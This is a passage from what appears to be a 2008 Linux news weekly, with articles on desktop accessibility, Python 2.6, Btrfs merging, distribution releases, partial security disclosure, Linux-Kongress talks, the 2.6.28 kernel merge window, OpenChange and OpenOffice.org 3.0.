of 80 characters and text appears sequentially.  Screen readers for Braille
terminals would thus just automatically display what was last written and
permit the user
to navigate among these 25 lines.  Screen readers for speech synthesis (e.g.
speakup or yasr) would speak text as it appears on the screen, and have some
review facilities similar to what Braille screen readers have.  This works quite
well because applications are limited to the TTY interface, they cannot have
non-accessible fancy features such as graphical buttons.  Some applications may
still not be so easy to read, e.g. if they draw ASCII art or use colors to show
active buttons, but they often have options to get more accessible, a collection
of tips can be found on this wiki.

Accessibility of graphical desktops is on the other hand a quite recent matter,
in part because the issue is technically much less simple: while applications on
the text console are limited to producing text, these days graphical
applications 
usually render text as bitmaps themselves, so that the textual information is
not available outside of the application for screen readers.  There have been
application adaptation attempts in the past (like ultrasonix), but they never
really got popular.  The GNOME project has been developing AT-SPI (Assistive
Technology Service Provider Interface) for the past decade, and that has become
really promising with the advent of the Orca screen reader.  AT-SPI can be 
understood as a protocol between screen readers (e.g. Orca) and applications.
To be "accessible", applications thus have to implement AT-SPI, or use a toolkit
that implements it (like GTK and soon Qt), so that screen readers can get the
logical and textual content of the application.  Orca is not yet as good as
what mature, proprietary Windows screen readers can achieve, but it is already
usable for everyday work.  It is progressing rapidly, notably thanks to the
support of Sun and the involvement of the Accessibility Free Software Group.  At the
time of writing, only gtk+ 2 (and thus the GNOME desktop and gtk+ 2 
applications), Java/Swing, the Mozilla suite, OpenOffice.org, and acrobat reader
implement AT-SPI and thus are accessible.  Qt (and thus the KDE desktop) is
expected to support it once it gets rebased on D-BUS.  To get the best results,
the latest versions of applications should be used: for instance, Firefox is
really usable only starting from version 3.

Another approach is the use of self-reading applications.  For instance, Firevox
is a version of Firefox that integrates a dedicated screen reader.  That permits
a tighter interaction between the reader and the application, but
that is of course limited to that particular application.  Another example is
emacspeak, which is a vocalized version of emacs.  Some people simply just use
emacspeak and nothing else, as emacs already meets all their needs.

All in all, as usual the mileage varies.  Some people will be very happy with
the mature, efficient screen reading of the text console, while other
people will 
consider that as a regression (like going back to DOS) and prefer using
intuitive environments such as the GNOME desktop, even if the Orca screen reader
is still quite young.  It is actually quite common to use both: for instance the
text console for the usual work, and the graphical environment for tasks that
require it, like browsing Javascript-powered websites or manipulating OpenOffice
documents.

Upstream Integration

Now, how can all of that be installed?  Most distributions already provide most
of the useful packages, but they often lack documentation on which tools are
useful according to the various disabilities.  The Linux Accessibility Resource 
Site is a quite complete source of information on the various tools that one
could use.  There is also a wiki page  meant
for administrators to get started with accessibility needs.

A point worth noting, however, is that some distributions have accessibility
components built into their installation CDs.  For instance, starting from
Etch (aka Debian GNU/Linux 4.0), the Debian installer automatically detects
Braille terminals and if found,
switches to text mode, runs brltty, and makes sure that brltty
gets installed and configured on the target system.  Other distributions often
have been non-officially adapted into so-called "Braillified"
installation images.  The very important point is that it permits disabled
people to be completely independent from the help of sighted people, even
when the 
(re)installation of a system has to be done!  That is clearly one area in which
Windows is far behind GNU/Linux achievements.

Future Challenges

To sum it up, "accessible" GNU/Linux is getting its democratization step as
well, just a bit shifted in time compared to the average Linux democratization.
There are, of course, things that could be improved.  Even if distributions
usually contain accessibility software, it is hard for accessibility-newcomers
to know which software will be useful for the various kinds of disabilities
users can have, so distributions will have to develop wizards to help them.
In the 
meanwhile, websites such as the Linux Accessibility Resource Site can
be used as sources of information.  In any case, discussion with the disabled
users is essential to establish a suitable solution (setting up Braille output
would be useless if the user can not read Braille for instance).

Beyond the mere use of GNU/Linux or its installation, one area that still is not
really accessible at all is the early stages of the boot process.  With future
development of the recently added basic Braille screen reader, the Linux kernel
should eventually be able to provide basic feedback even before user space
screen 
reader daemons can be started from the hard disk.  Bootloaders like lilo and
grub are able to emit basic beeps, but being able to accurately edit the
kernel command line, for example, would require some support.  Last but not
least, tinkering 
with BIOS settings is currently possible for disabled people only on high-end
machines that can drive a serial console.  The democratization of the EFI
platform could be an opportunity to embed basic screen reading functionalities.


[Samuel Thibault has been working on accessibility since 2002, when he and
a blind 
colleague designed the BrlAPI client/server Braille output engine, now
used by Orca for Braille support . Since then he has worked on various
accessibility 
tasks, from the Debian installer support to Braille standardization.  In his
professional life, he conducted a PhD on thread scheduling on high-end
machines, 
and is now a lecturer at the University of Bordeaux.]

		Python 2.6 makes its debut


Version 2.6 of the Python language was
announced
on October 2, 2008.
A.M. Kuchling's extensive

Whats New in Python 2.6 document covers the main goal of this
release:
"The major theme of Python 2.6 is preparing the migration path to Python 3.0, a major redesign of the language. Whenever possible, Python 2.6 incorporates new features and syntax from 3.0 while remaining compatible with existing code by not removing older features or syntax. When its not possible to do that, Python 2.6 tries to do what it can, adding compatibility functions in a future_builtins module and a -3 switch to warn about usages that will become unsupported in 3.0."


Python 2.6 marks some changes in the language's development process:
"While 2.6 was being developed, the Python development process underwent two significant changes: we switched from SourceForges issue tracker to a customized
Roundup
installation.."


Python 2.6 also included a switch to the
reStructuredText
documentation format via the
Sphinx Python documentation generator.  A.M. Kuchling explains the reason for the move:
"The Python documentation was written using LaTeX since the project started around 1989. In the 1980s and early 1990s, most documentation was printed out for later study, not viewed online. LaTeX was widely used because it provided attractive printed output while remaining straightforward to write once the basic rules of the markup were learned.
Today LaTeX is still used for writing publications destined for printing, but the landscape for programming tools has shifted. We no longer print out reams of documentation; instead, we browse through it online and HTML has become the most important format to support."


Numerous changes have been made to the Python language
and its large collection of modules.
Many of these changes came through the
Python Enhancement Proposal (PEP) system including:


PEP 343: the "with" statement.
 
PEP 366: main module explicit relative imports.
 
PEP 370: per-user site-packages directory.
 
PEP 371: addition of the multiprocessing package to the standard library.
 
PEP 3101: advanced string formatting.
 
PEP 3105: make print a function.
 
PEP 3110: catching exceptions in Python 3000.
 
PEP 3112: byte literals in Python 3000.
 
PEP 3116: new I/O library.
 
PEP 3118: revising the buffer protocol.
 
PEP 3119: introducing abstract base classes.
 
PEP 3127: integer literal support and syntax.
 
PEP 3129: class decorators.
 
PEP 3141: a type hierarchy for numbers.


Many new modules were added and a lot of existing modules were extended
in Python 2.6.
The list includes: ast (abstract syntax tree), future_builtins,
json (JavaScript object notation), plistlib (property list parser),
ctypes, and ssl.
A number of modules were deprecated in this release,
including: audiodev, bgenlocations,
buildtools, bundlebuilder, Canvas, compiler, dircache, dl, fpformat,
gensuitemodule, ihooks, imageop, imgfile, linuxaudiodev, mhlib, mimetools,
multifile, new, pure, statvfs, sunaudiodev, test.testall, and toaiff.


Finally, there were many minor module changes, C API changes,
optimizations, interpreter changes and platform-specific changes to
Python 2.6.  Python continues to be a live and evolving language,
this release represents a fairly large set of changes that will pave
the way forward to Python 3.


		Btrfs to the mainline?


One of the kernel projects that seems to be attracting a fair amount of
attention these days is the new, copy-on-write filesystem, Btrfs.  While still rather
immature—the disk format is slated to be finalized by the end of the
year—Btrfs has reached a point where lead developer Chris Mason wants
to start talking about when to merge it
into the mainline.  Some are advocating moving quickly, while others are a
bit more skeptical that merging it will lead to faster development.


Merging Btrfs would have a number of advantages, but more eyes is what
Mason is seeking:

But, the code is very actively developed, and I believe the best way to
develop Btrfs from here is to get it into the mainline kernel (with a
large warning label about the disk format) and attract more extensive
review of both the disk format and underlying code.

The Btrfs developers are committed to making the FS work and to working
well within the kernel community.  I think everyone will be happier with
the final result if I am able to attract eyeballs as early as possible.


Typically, kernel code is not merged until it is ready, but an argument can
be made that filesystems, like device drivers, are
sufficiently isolated from the rest of the kernel that an early inclusion
will do little harm.  Also, a kind of precedent was set by the early "merge" of
ext4, though that was an evolution of the existing ext3 filesystem, while
Btrfs is entirely new.  Andrew Morton has been encouraging Mason to get 
Btrfs "into linux-next asap and merge it into 2.6.29."  He
describes his reasoning:


My thinking here is that btrfs probably has a future, and that an early
merge will accelerate its development and will broaden its developer base. 
If it ends up failing for some reason, well, we can just delete it
again.

For various reasons this approach often isn't appropriate as a general
policy thing, but I do think that Linux has needed a new local
filesystem for some time, and btrfs might be The One, and hence is
worth a bit of special-case treatment.


Adrian Bunk is not convinced that an early
merge will bring the benefits that Morton is touting.  He points to an early ext4 development plan,
noting that the timelines outlined in that message were, perhaps, overly
optimistic. "When comparing with what happened in reality it kinda
disproves 
your 'acceleration' point."


There is a difference, though, between ext4 and Btrfs, that Serge Hallyn points out:

OTOH, maybe it's just me, but I think there is more excitement around
btrfs.  Myself I'm dying for snapshot support, and can't wait to try
btrfs on a separate data/scratch partition (where i don't mind losing
data).  btrfs and nilfs - yay.  Ext4?  &lt;yawn&gt;  That can make all the
difference.


The original timeline showed mid-2007 as a target for a stable ext4
filesystem, but the project overshot that by a year or so.  A recent patch
proposes renaming ext4dev to ext4 because it "is getting stable
enough that it's time to drop 
the 'dev' prefix."  Unexpected difficulties led to
ext4 development taking longer, as Mason describes: 

Ext4 has always had to deal with the ghost of ext3.  Both from a
compatibility point of view and everyone's expectations of stability.  I
believe that most of us underestimated how difficult it would be to move
ext4 forward.


Many seem to think that Btrfs is different, but it still has a ways to go.
Currently, it does not handle I/O errors very well, while running out of
space on 
the disk can be fatal.  But it is getting close to usable—at least for
testing and benchmarking.  Getting the code into the mainline would cause
more folks to look at it, as well as test various filesystem changes
against it.  Mason gives an example of how that can work:

For example, see the streaming write patches I sent to fsdevel last
week.  I wouldn't test against ext4 as often if I had to hunt down
external repos just to get something consistent with the current
development kernels.  ext4 in mainline makes it much easier for me to
kick the tires.


Btrfs has an aggressive
schedule that targets a 1.0 release this year.  The focus of that release
is to nail down the on-disk format so that changes after that point will be
backward compatible.  Given that 2.6.29 will likely be released in
early to mid-2009, it seems quite possible that Btrfs will be "merge-worthy" by
then, which means that it really is not premature to start considering it
now.


		New Release Season


Right now there are several major distributions preparing new releases.
Ubuntu, openSUSE, Mandriva and Fedora are all on semi-regular six-month
schedules; releasing each spring and fall.  Debian has a much longer
schedule, but that project is also nearing the release of Debian 5.0
"Lenny".

Ubuntu 8.10, "Intrepid Ibex" is due for a final release on October 30,
2008.  Some new features have been added since the release of Ubuntu 8.04 "Hardy Heron".
Some highlights include GNOME 2.24 with tab support in the Nautilus file
manager and new file types supported by File Roller.  X.Org 7.4 has better
support for hot-pluggable input devices such as tablets, keyboards, and
mice.  Ubuntu 8.10 Beta includes Linux kernel 2.6.27, a release with better
hardware support and numerous bug-fixes.  The ecryptfs-utils package has
been included with support for a secret encrypted folder in your Home
Folder.  The "Last successful boot" recovery entry retains a copy of your
running kernel and makes it available from the boot loader as a "Last
successful boot" option.  Network Manager 0.7 has
some new features that are included in this release.  There are also a few
known issues with the beta release, so check the wiki before
installation.

openSUSE 11.1 is currently at  beta
2.  Some changes since the first beta include VirtualBox 2.0.2, the
Intel e1000e have been disabled, OpenOffice.org 3.0RC2 from the openSUSE
build service, plus GNOME 2.24.0, KDE 4.1.2, Mono 2.0 RC 3, Compiz 0.7.8,
and more.  You can see an expanded package
list for the factory tree at DistroWatch.  Just scroll down to see all
the packages with version numbers.  You can also find out more about
openSUSE 11.1 on this
page, which includes links to the most
annoying bugs and the roadmap which calls for a
final release on December 18, 2008.

Mandriva 2009.0 "sophie" could already be officially released, since it is
due on October 9, 2008.  The second release candidate
wiki site lists some major new features including improved boot speed,
support for LUKS encrypted partitions in installer and diskdrake, improved
support for netbook hardware, support for Intel G41 graphics chipset, and
GNOME 2.24 final.  KDE4 is the default desktop for sophie.  You can find
out more about KDE/Mandriva integration here.  The 2009.0
Development page has more information.

Fedora 10 "Cambridge" is currently scheduled for
release on November 25, 2008.  The accepted
feature list for F10 includes an AMQP
Infrastructure, that makes it easy to build scalable, interoperable,
high-performance enterprise applications.  F10 also has better printing,
better remote support, faster startup, the Echo Icon Theme, Eclipse 3.4,
GNOME 2.24, RPM 4.6, the Sugar desktop (used in OLPC), and much more.

Debian 5.0 "lenny" was originally scheduled for release in September.  Now
the release date is "when it's ready", which should be soon.  We covered lenny in the July 31st edition, at the
freeze.  "Now to explain what,
exactly, we mean by "freeze".  The freeze upload policy of uploading
changes in through unstable if possible will be continued to apply until
the release."  Since then there has been lots of bug fixing.  See
more in the Debian "lenny"
Release Information page.  Debian 5.0 won't have the newest packages
like the distributions mentioned above, but when Debian 5.0 is declared
stable you will have just that; a stable system that will be supported for
several years.

		Partial disclosure


We are increasingly seeing disclosures of security vulnerabilities that
don't actually disclose much, except that the researcher has found
something.  Unfortunately, we have also seen lots of evidence that once the
presence 
of a flaw is known, it doesn't take very long for folks to figure out what
the vulnerability is.  Of course, we don't have any data on how long it
takes those with a malicious intent to find the flaws, but clearly the
"white hats" find them quickly.  So what or who, exactly, are those practicing
"partial disclosure" protecting?


Partial disclosure is clearly a part of the "security circus" that Linus
Torvalds recently castigated, as it serves to increase the notoriety of
security researchers, without necessarily doing anything to help protect
users.  Several recent examples come to mind of researchers who have found
real flaws, but for various reasons don't want to disclose the details.
Instead they "tease" the world by talking around what they found,
trying—and generally failing—to leave out enough information so
that others can't immediately follow in their footsteps.


Dan Kaminsky's DNS flaw was
an interesting example in that Kaminsky only disclosed the vulnerability to
affected software vendors, allowing them multiple months to produce
patches.  He then wanted to give administrators time to apply the patches
so he delayed disclosing the flaw for another month or so.  He also had an
admittedly selfish reason for delaying disclosure: he wanted to announce it
at the Black Hat security conference.  


Because of the addition of source port randomization as the fix, it didn't
take very long for other security researchers to come up with the
vulnerability.  Attackers may have come up with it even more quickly, but
because there were no details available, developers of other, smaller DNS
servers—not privy to the initial disclosure—were unable to
determine whether their code was vulnerable.  It is commendable that
Kaminsky worked with the vendors to fix the problem, but there were clearly
holes in his disclosure methods.


A worse case can be seen with the recent spate of reports about
"clickjacking".  It started with a report
of a canceled talk at the OWASP AppSec conference.  The name is
clearly suggestive of where the vulnerability might be, and the description
of the canceled talk gave enough information that others
were able to duplicate it.  This led one of the original researchers to
release
the vulnerability information.


So, in the interim, there was enough information floating around to find and
exploit the flaws, and now the vulnerability info has been released, but
there are no fixes available for many of them.  It is hard to see what
delaying the disclosure did for anyone—researchers or
users—here.  It did generate lots of press, though, partially because
of the name as Bruce Schneier pointed
out pre-disclosure: 

"Clickjacking" is a stunningly sexy name, but the vulnerability is really
just a variant of cross-site scripting. We don't know how bad it really is,
because the details are still being withheld. But the name alone is causing
dread.


Yet another recent example is the denial
of service reported for nearly any TCP device.  Like clickjacking, it
is being described in scary ways—which may well be justified:

Robert and I talk a lot, and I asked him if he'd be willing to DoS us, and
he flatly said, "Unfortunately, it may affect other devices between here
and there so it's not really a good idea." Got an idea of what we're
talking about now? This appears not to be a single bug, but in fact at
least five, and maybe as many as 30 different potential problems. They just
haven't dug far enough into it to really know how bad it can get. The
results range from complete shutdown of the vulnerable machine, to dropping
legitimate traffic.  


There may well be enough information in the description of what the
researchers found—and, in particular, how they found it—for an
enterprising attacker to find it for themselves.  In the meantime, the rest of
us are left in the dark.  Security researchers are clearly under no
obligation to disclose their research sensibly, but it would seem
that either releasing all the details at once, or keeping them completely
secret, would be better than these partial disclosures.


		LK2008: The values of the Linux community


The opening keynote speaker for the 2008 Linux-Kongress was James
Bottomley, who presented his views on the Linux community's values.  What these
values are, says James, is not entirely obvious.  Related groups - the free
software community, for example - have well-articulated value systems which
define them.  The Linux community's values are not so clearly expressed,
but, he says, they are central to what we do.


James started with a bit of history, noting the the initial value placed on
software was entirely commercial.  Once the industry realized that software
could be worth far more to its users than it costs to create, the
proprietary mode became dominant - and that has affected the evolution of
programming in general.  The value placed on the code by its developers
became irrelevant, leading to "paycheck coding."  There is no value placed
on creativity, and such a model leads to bad code.


Eventually Richard Stallman came along and challenged the commercial view
of software.  But, during this time, about the only alternative to
commercial software was the BSD Unix distribution, and that got caught up
in the lawsuit by ATT.  So closed software took over; Windows won on
commodity platforms, but proprietary software also became dominant in the
Unix arena.


In 1991, Linux hit the scene; since then, it has become the most popular
and vibrant free software operating system available.  In a sense, this is
interesting, in that Linux is licensed under the GPL, a license that many
companies hate.  Apple explicitly chose BSD as the base for MAC OS to
avoid GPL-licensed code.  But, despite this antipathy, lots of companies
use Linux, and even contribute to its development.  It is interesting,
James says, to look at why that is.


The reason is the Linux community's values.  In particular, the community
prizes technical merit above all other considerations - including small
things like what any company or user would like to have.  Also prized is
passion; code supported by a developer who clearly cares about it will
generally fare better in the review process.  If the code quality and the
passion are there, the community does not care about much of anything
else.  Factors like the source of the code or who might benefit from its
incorporation don't really matter.


In particular, contributors to the kernel are not required to sign on to
any particular belief system or any specific view of freedom.  A
contributor may have an FSF-like belief in free software, or, instead, be a
corporate developer who does not care about software freedom at all.  Even
the BSD community requires acquiescence with a specific view of freedom.  A
Linux contributor, instead, need only be willing to contribute the code
under the share-alike rules of the GPL.


As a result, anybody can play with Linux, regardless of philosophy or
corporate status.  We have a community which is defined by contributions,
not by a specific set of values regarding software freedom.  That has
allowed the formation of a very diverse community with a specific shared
interest: creating the best kernel we can.


There are some significant benefits from this approach.  It forces
companies to recognize their engineers' values; that, in turn, makes for
more motivated developers.  Developers who are interested in improving
Linux can get resources and support from corporations.  Users get
high-quality code from developers who care about what they are doing.
Companies get the ability to focus on their little piece of the problem
while taking advantage of the community-maintained kernel for the rest;
they can also offload their older code to the community for long-term
maintenance.


James compared the Linux way of doing things with the US constitution.
That document only mentions freedom three times, yet it has become a
blueprint which has supported freedom for over 200 years.  It is a
relatively short document.  The proposed EU constitution, instead, is about
20 times the length, before taking into account other documents which are
referenced.  That document would appear to be somewhat bloated; the goals
would be better served by a more concise formulation.

Similarly, the Linux community spends little time talking about freedom.
Instead, the focus is on a set of brief principles involving code quality
and passion.  Freedom is not legislated; it arises as an emergent
value inherent in the Linux way of doing things.  Linux has managed to
bring about software freedom without talking about it, and without imposing
a view of software freedom on its contributors.  In the process,
Linux has succeeded in creating something which is as free - or more free -
than the GNU system envisioned by the Free Software Foundation.

During the question period, James wished for a free software advocate who
would argue the point with him, but no such person emerged.  He will, it
seems, have to repeat the talk in a different venue before he can have that
debate.

		Merged for 2.6.28


As of this writing, 4193 non-merge changesets have been incorporated for
the 2.6.28 kernel.  In other words, this merge window is just beginning,
having merged probably less than half of the patches which will eventually
find their way into the mainline.  What we see so far are a lot of drivers
and incremental improvements, but not many major changes.


User-visible changes for 2.6.28 include:


 There are new drivers for Analog Devices SSM2602, AD1882A and AD1980 codecs,
     Freescale MPC5200 I2S audio devices,
     Texas Instruments TLV320AIC26 codecs,
     Tascam US-122L USB Audio/MIDI interfaces,
     Wolfson Micro WM8580, WM8900, WM8903, and WM8971 audio devices,
     Blackfin SPORT peripheral interface controllers,
     NVIDIA HDMI HD-audio codecs,
     Toshiba RBTX4939 MIPS boards,
     Atheros L2 10/100 network adapters,
     Cisco 10G Ethernet adapters,
     JMicron JMC250 chipset-based network adapters,
     QLogic QLGE 10Gb Ethernet adapters,
     SMSC LAN95XX based USB 2.0 10/100 ethernet devices,
     AFEB9260 ARM-based boards (an open source board design),
     Arcom/Eurotech VIPER boards,
     AT91SAM9X watchdog devices,
     ITE IT8716, IT8718, IT8726,  and IT8712 Super I/O watchdogs,
     W83697UG/W83697UF watchdog devices,
     TLV320AIC23 codecs,
     Micron MT9M111 camera chips,
     Magic-Pro DMB-TH tuners,
     Afatech AF9015 and AF9013 DVB-T USB2.0 receivers,
     Conexant cx24116/cx24118 tuners,
     DVB cards based on SDMC DM1105 PCI chip,
     Silicon Laboratories SI2109/2110 demodulators,
     ST STB6000 DVBS Silicon tuners,
     numerous Fujifilm FinePix cameras,
     ALi  video camera controllers,
     WM8400 AudioPlus HiFi codecs, and
     SGS-Thomson M48T35 Timekeeper RAM chips.


 Support for the old Sun 4 architecture and ColdFire serial ports has
     been removed. 

 There is a new sysfs file (unload_heads) which can be 
     used by a user-space process to tell an ATA disk to retract its heads
     and prepare for an impact.  When used in conjunction with an
     accelerometer, this feature could be used to attempt to preserve a
     disk in a falling laptop.

 Improved support for ptrace() - and support for precise event-based
     sampling in particular - has been added for the x86 architecture.

 The crypto subsystem has gained support for deterministic ANSI X9.31
     A.2.4 pseudo-random number generation.

 The SMACK security module can now be configured to enforce mandatory
     access control rules on privileged processes.

 There is a script which can be used to generate a minimal "dummy"
     policy for SELinux.  The smallest workable policy, it seems, is 587
     lines long.

 Some sound devices can detect the presence of audio devices on input
     and output jacks.  The ALSA layer now allows drivers for those devices
     to register those jacks and report the presence of devices attached to
     sound cards through the input layer.

 Work with multiqueue networking continues; 2.6.28 will include the
     ability to associate a separate queueing discipline with each internal
     packet queue.

 The wireless regulatory
     compliance subsystem has been merged.

 The kernel now supports the Phonet packet protocol  used by
     Nokia cellular modems.  See networking/phonet.txt in the kernel
     documentation directory for more information.

 Also added to core networking is support for the Distributed Switch
     Architecture protocol, with initial support for a number of Marvell
     switch chips.

 The netfilter layer has been augmented to support network namespaces.

 The ext4 system has lost the "ext4dev" name; this is a signal that the
     developers are getting ready to declare it ready for production use.
     Ext4 has also gained a set of static tracepoints for use with
     SystemTap or other tracing tools.

 The FIEMAP
ioctl() for extent mapping has been added.

 Xen has added CPU hotplugging support.

 Version 4 of the rpcbind protocol is now supported; this enables the
     kernel to offer RPC services via IPv6.

 The OCFS2 filesystem has gained a number of features, including POSIX
     locks, extended attributes, and use of the JBD2 journaling layer.


Changes visible to kernel developers include:


 Discard request 
     and request timeout handling have been added to the block layer; a
     number of other internal API changes have been made as well.  See this article for details.

 Video4Linux2 drivers no longer have their open() function
     called with the big kernel lock held.  The lock_kernel()
     calls have been pushed down into individual drivers within the
     mainline tree; external drivers will need to be fixed.


The merge window is likely to remain open until approximately
October 24.

		Connecting to Microsoft Exchange with OpenChange


Working with a Windows network from Linux has never been a smooth ride.
While Samba, Wine and OpenOffice.org have made many components workable, connecting to the Microsoft Exchange email server has remained unreliable. Now the OpenChange developers hope to change that, providing the same capabilities as Microsoft Outlook in a range of Linux-native clients like Kontact and Evolution.
OpenChange is not yet workable, but partial operation can demonstrate
its potential.


If you want to connect to Exchange at the moment, you have a few options. Evolution can connect using a hack with Outlook Web Access, providing email, shared folders, calendars and contacts. But it's far from reliable; I tried to get by with it at the office, warts and all, and managed it for a couple of weeks before resigning myself to Windows. The other options are even worse -- just use the webmail client, or use the IMAP server for email and hacks such as

this one to get at other data in a manner similar to Evolution. Working from home on Kubuntu, I find it easier to just use the webmail client.


OpenChange is taking a much more sensible approach. At the heart of the project is a 
MAPI-compatible API, which allows clients to talk directly to Exchange and access all of its functionality. The code is still being actively developed, but some application developers have started playing around with it; the first code for Evolution came out in

January 2008. According to Brad Hards, an OpenChange and Kontact developer, "OpenChange can do most of the Exchange tasks now, though it can't currently do free/busy."


For the curious, OpenChange developer Julien Kerihuel has written a simple command-line client. It's currently available in Ubuntu Intrepid and Debian Experimental, though you're better off compiling it yourself as it is changing quite rapidly. It isn't especially well documented, and the manpage implies some functionality that Kerihuel is still working on, but I did have some success.


First, you need to set-up a new profile:


You can check if it has worked by listing your mailboxes:


I managed to send a test email, which I picked up in Outlook without problems. When I opened the same email in KMail, however, it has a "winmail.dat" binary file attached, which you wouldn't normally get in emails from Outlook.


You can also interrogate folders, send emails, create and delete contacts, calendar appointments and access most of the other Exchange functionality. Kerihuel: "Openchangeclient is a test case for libmapi, it's a useful way to test if a problem is in the client application or in libmapi, and there is a plugin for sugarcrm, so it may remain in future." There's a proxy server using Samba too, for those who want yet another way of connecting.


For Kontact users, usable integration is probably a good 6 months away. The akonadi resource can deal with most of OpenChange's functionality, "at least a bit", accord to Hards, though "Kontact can't currently make use of it because it isn't converted to akonadi yet." KDE 4.2 should come out with akonadi integration, but the OpenChange functionality might not yet be stable enough for large quantities of important data. Hards thinks KDE 4.3 is probably
"the sweet spot."


Until then, Ballmer's mantra remains relevant; OpenChange and its client implementations could do with developers, developers, developers. Cracking this nut could throw open Exchange to a new range of clients, and as Kontact and its peers become stable on Windows and MacOSX, an entrenched Windows server will pose less of a threat to free software migrations on desktops.


		LK2008: Embedded and Mobile Linux


Linux-Kongress 2008 attendees had the opportunity to hear two different
sessions dedicated to organizations trying to improve the state of Linux
support for embedded and mobile systems.  They have similar goals, but are
taking different approaches and have different levels of resources
available to them.


The first of these is OpenSourceEmbedded, presented by uClinux developer
Jeff Dionne.  He opened with a statement that, ten years ago, Linux-based
embedded systems were nearly unknown.  Now those systems are everywhere,
with hundreds of millions of deployments.  Embedded systems, he says, make
up the largest installed base of Linux systems.

All is not perfect, though, in the embedded sphere.  Linux still has an
uncomfortably 
large footprint for embedded use.  There is also no unified distribution
for embedded use; instead, the industry is full of homemade solutions made
by vendors.  He would like to address this situation through the creation
of a next-generation platform.  It would take the form of a kit that
developers could start with which comes equipped with design examples for a
number of applications: telephones, digital video recorders, etc.

There are two hardware platforms being targeted initially by this effort.
One is a Plasma MIPS processor - a very simple device which can be
implemented with an FPGA.  A simulator for this processor runs about 600
lines of code.  The other, more advanced platform is a LEON 2/3 SPARC
processor, a full system with a memory management unit and which supports
multiprocessor configurations.  Examples of the first processor include a RealTek
MIPS system, while the LEON SPARC CPU is similar to current SuperH 3
processors.  The Plasma and LEON SPARC processors are being designed now,
with the intent of producing them as open hardware designs.

On top of these processors will be a base operating system layer with a
"mini-POSIX" environment.  There will be an interesting packaging system
which stores components as separate "blocks" in flash, outside of any
filesystem.  The running system will be assembled from the blocks by the
boot loader.  This organization is designed to avoid bricking; any bad or
corrupted components can simply be bypassed without affecting the
functioning of the rest of the system.  This, evidently, is how PalmOS did
things. 

The next challenge is creating a community around this whole effort.  To
that end, resources are to be put up at opensourceembedded.org - though
nothing is available as of this writing.  The site will include project
hosting, along with the ability to download the development kits.  Jeff
says that the uClinux experience has shown that the kit approach works;
with a ready-to-use code base like that, a community can come together.

There are also plans to create an organization behind this effort which,
among other things, can enter into non-disclosure agreements with hardware
manufacturers.  This organization will also work to help vendors ship
GPL-compliant products.

OpenSourceEmbedded appears to be in an early state, so it's hard to make
any guesses about how successful it will be.  For more information, see Jeff's slides
[PDF]. 

Mobile Linux

The closing session at the 2008 Linux-Kongress was a talk by Dirk Hohndel,
who began by noting that Linux-Kongress is, in fact, the oldest Linux
event.  It was first held in 1994, and hosted many of the kernel developers
who were active at that time; Dirk estimates that about half of the
development community was to be found in a single room.  It would take a
rather larger room to accomplish that now.  Dirk complimented the event on
its avoidance of commercialism and its sustained focus on the technology.

The technology that Dirk came to talk about was mobile Linux.  He started
by expressing his disappointment with desktop Linux.  It has become a
collection 
of poorly-integrated applications which are somehow trying to replicate
Windows 95.  The result does not work well on the desktop, and it
most certainly is not optimized for the mobile environment.

But, says Dirk, mobile Linux is not really embedded Linux either.  Embedded
Linux evokes images of access points and other single-application boxes
which are not meant to be extended past a single function.  They are not
concerned with the user's experience, and they are not concerned with
mobility.  The subject here is devices with a screen, and which can have
new applications installed onto them.  So some sort of desktop-like
interface is needed, but current desktop Linux does not fill the bill.

According to Dirk, the problem with desktop Linux is the fundamental
approach: developers are not the target audience for this software, but
they are making all the interface decisions.  What's needed is input from
people who are specialized in interface design and human-computer
interaction.  That leads to a "scary thought": interface specialists are
generally not coders, but they will be making decisions that coders are
expected to implement.  That is not a normal mode of operation in the free
software community, but it is needed here.

Other problems include the proliferation of "80% done" projects.  Much of
the work has been done, but nobody wants to do the work to finish the job.
There's also far too many choices; in general, says Dirk, people do not
like it if they have to choose between more than two alternatives.  When
dealing with the Linux desktop, it's hard to find situations where there
are fewer than six choices.  And, overall, the Linux desktop lacks
consistency.  That, says Dirk, is why he uses an Apple laptop.  Apple
enforces a consistent design across the application space and, he says, the
result is very nice.


Devices should be simple and natural to use; such devices are increasingly
hard to find anywhere.  As an example, he held up a paper notebook.  The
device boots very quickly, has a nice "touch-based" pencil-oriented
interface.  No manuals or explanations are needed.  Linux-based devices
should be just as easy to use.  But, at the same time, they need to offer
an experience which is close to what people expect from an ordinary,
desktop computer.  It should have access to the Internet, and users should
be able to install software.


Dirk then pulled out an Eee PC system and gave the five-second boot demonstration.
This work, he says, is an example of what is being done by Intel in support
of the Moblin project.  Intel is
trying to solve some of the hardest problems in the mobile space,
contributing the results for everybody to use.

To that end, Moblin is working toward the creation of a base distribution
for mobile systems.  The user interface will be based on the GNOME mobile
work, but with a lot of enhancements.  The end goal is the creation of a
Linux distribution for mobile devices which is far better
than the 
state of the art today.  It is not, he says, an attempt to compete with
distributors; instead, Moblin is providing a base which the distributors
can build on.  Intel's effort will naturally focus on Intel processors, but
contributions for any architecture are welcome at Moblin.


In conclusion, Dirk noted that Linux's success on the server side was
relatively easy.  The mobile problem is much harder.  Intel is hoping that
others will join in to help Moblin reach its rather ambitious goals.

		OpenOffice.org releases 3.0, faces new challenges


A new version of the popular free software office application suite,
OpenOffice.org (OOo) 3.0, was released this week to lots of
press and enough download traffic to bring down its webserver.  While the
release isn't a huge leap 
forward in terms of features, it does provide some compelling
enhancements.  Perhaps the most interesting is the increased focus on
extensions, a la Firefox, that don't require modifying the core OOo
code.  This may help combat the problem—or perceived
problem—that Sun is stifling OOo development through its bureaucratic
procedures for adding new functionality.


The first thing one notices when starting up OOo 3.0 is the new splash screen,
but it appears for only a short time.  One of the major complaints about
the suite has been how long it takes to start up—something that has
been addressed in 3.0.  The application opens to a new welcome screen (seen
at left) that presents a more friendly appearance, rather than an empty
window, for new users.  Once
past that point, the various tools look much as they did in OOo 2.4 and
earlier versions.


The other changes are mostly under the covers; they will be noticed by
power users, but are not immediately obvious to basic users.  These
include:

Writer (word processor) has a new slider for zooming
Writer allows multi-page display and editing
Calc (spreadsheet) allows up to 1024 columns per sheet
Draw (drawing) can handle poster-size files
Impress (presentation) supports multiple monitors for
presentations
Writer has additional editing modes for multi-lingual support as well
as wiki document editing
Calc has a new equation solver
Chart (graphing) has improved graphical output


The OOo extensions
repository has many different kinds of add-ons for OOo, that provide
new or enhanced functionality for users.  The most popular is the PDF
import extension which allows loading PDF files into the application
for editing.  Given that OOo has long had the ability to natively export
PDFs, importing them is an excellent addition.


Clearly Sun and the OOo project see extensions as a fertile ground for
